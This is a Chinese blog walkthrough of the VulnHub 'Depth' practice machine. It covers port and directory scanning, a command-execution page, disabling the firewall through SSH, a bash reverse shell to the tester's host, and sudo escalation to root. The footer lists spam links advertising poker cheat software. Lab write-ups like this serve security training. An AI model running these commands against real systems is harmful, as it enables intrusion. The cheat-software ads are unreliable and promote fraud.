【vulnhub】Depth靶机
创始人
2024-11-13 03:41:18
0

靶机安装

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

运行环境:VMware运行该虚拟机

信息收集

靶机IP发现

nmap 192.168.93.0/24

端口扫描

nmap -A 192.168.93.154 -p-

只开起了8080端口

进行目录扫描8080端口

dirsearch -u http://192.168.93.154:8080

有一个目录/test.jsp

IP网址访问

翻译过后为

后面拼接/test.jsp

翻译过后

提示我们输入 ls -l /tmp 测试一下

存在系统命令执行漏洞,进行利用,反弹shell尝试失败

漏洞利用

ls -l /home 查看到home目录内容,发现bill用户

输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。

尝试关闭防火墙

#尝试关闭防火墙 ssh bill@localhost sudo ufw disable

再次执行反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.93.130/8787 0>&1

获取shell成功

提权

尝试sudo提权

sudo -l,发现所有用户(ALL)都有sudo权限,

直接 sudo su 命令

查看flag文件

上一篇:鸿蒙(HarmonyOS)项目方舟框架(ArkUI)之RichText组件

下一篇:两分钟了解!wpk透视软件网站(透视)wepoker确实有挂(有挂指点)

相关内容

热门资讯

九分钟教程!微扑克辅助软件(透... 九分钟教程!微扑克辅助软件(透视)外挂透明挂辅助app(2023已更新)(哔哩哔哩);1、下载好微扑...
8分钟总结!微扑克可以用模拟器... 8分钟总结!微扑克可以用模拟器(软件透明挂)其实真的有挂(有挂技巧)-微博客户端;1、每一步都需要思...
四分钟安装!德州ai人工智能软... 四分钟安装!德州ai人工智能软件免费(辅助透视)外挂透明挂辅助器(2020已更新)(哔哩哔哩);德州...
7分钟教程!wpk线上德州俱乐... 7分钟教程!wpk线上德州俱乐部(辅助挂)都是真的有挂(有挂攻略)-微博客户端1、玩家可以在wpk线...
2分钟攻略!wepoke软件透... 2分钟攻略!wepoke软件透明是真的吗(辅助挂)外挂透明挂辅助APP(2020已更新)(哔哩哔哩)...
5分钟推荐!aapoker软件... 5分钟推荐!aapoker软件讲解(辅助透视)果然真的有挂(有挂教程)-百度知乎1、aapoker软...
9分钟脚本!wepooke a... 9分钟脚本!wepooke app系统规律(辅助)外挂透明挂辅助机制(2020已更新)(哔哩哔哩)运...
两分钟脚本!wpk有透视辅助(... 两分钟脚本!wpk有透视辅助(辅助透视)都是真的有挂(有挂教程)-今日头条;一、wpk有透视辅助AI...
八分钟攻略!红龙扑克模拟器(辅... 八分钟攻略!红龙扑克模拟器(辅助)外挂透明挂辅助神器(2021已更新)(哔哩哔哩)1)红龙扑克模拟器...
7分钟攻略!德扑牌型胜率(软件... 7分钟攻略!德扑牌型胜率(软件透明挂)总是真的有挂(有挂教学)-微博客户端1、完成德扑牌型胜率的残局...